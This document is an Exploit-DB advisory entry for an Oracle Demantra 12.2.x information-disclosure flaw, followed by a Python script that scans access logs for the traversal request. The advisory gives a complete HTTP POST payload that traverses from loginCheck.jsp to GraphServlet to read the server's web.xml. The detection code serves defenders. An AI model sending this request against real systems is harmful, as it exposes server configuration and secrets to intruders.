Oracle Supply Chain Products Suite – Remote Security

  • Author: Oracle
    Date: 2014-01-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39018/
  • source: https://www.securityfocus.com/bid/64836/info
    
    Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management.
    
    The vulnerability can be exploited over the 'HTTP' protocol. The 'DM Others' subcomponent is affected.
    
    Attackers can exploit this issue to obtain sensitive information.
    
    This vulnerability affects the following supported versions:
    12.2.0, 12.2.1, 12.2.2
    
    POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1
    Host: target.com:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 46
    
    filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml
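
For defenders, a log check for the request shape shown above, added here as an example (it is not part of the original advisory or any Oracle code): it flags access-log entries whose request path contains `..` segments and reports the path they resolve to, marking those that go from a JSP path to GraphServlet. The combined log format, the sample lines and all function names are assumptions; POST bodies such as the `filename` parameter are normally absent from access logs, so only the path is inspected.

```python
import posixpath
import re
from urllib.parse import unquote

# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d(?:\.\d)?"')

def canonical_path(target):
    """Return (decoded_path, resolved_path) for a request target."""
    path = target.split("?", 1)[0]   # '..' inside the query string is not path traversal
    for _ in range(3):               # unwind repeated percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    return path, posixpath.normpath(path)

def check_line(line, servlet="GraphServlet"):
    """Return a finding dict if the request path contains '..' segments, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded, resolved = canonical_path(m.group("target"))
    if ".." not in decoded.split("/"):
        return None
    return {
        "client": line.split(" ", 1)[0],
        "method": m.group("method"),
        "requested": decoded,
        "resolved": resolved,
        # The form shown in the advisory: a JSP path that resolves to the servlet.
        "matches_advisory": ".jsp/" in decoded and resolved.endswith("/" + servlet),
    }

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jan/2014:10:00:00 +0000] "POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1" 200 5120',
    '192.0.2.11 - - [14/Jan/2014:10:00:05 +0000] "GET /demantra/common/loginCheck.jsp HTTP/1.1" 200 812',
    '192.0.2.12 - - [14/Jan/2014:10:00:09 +0000] "GET /demantra/portal/help.jsp?page=../index HTTP/1.1" 200 431',
]

def scan(lines):
    """Return the findings for every line that check_line flags."""
    return [f for f in map(check_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```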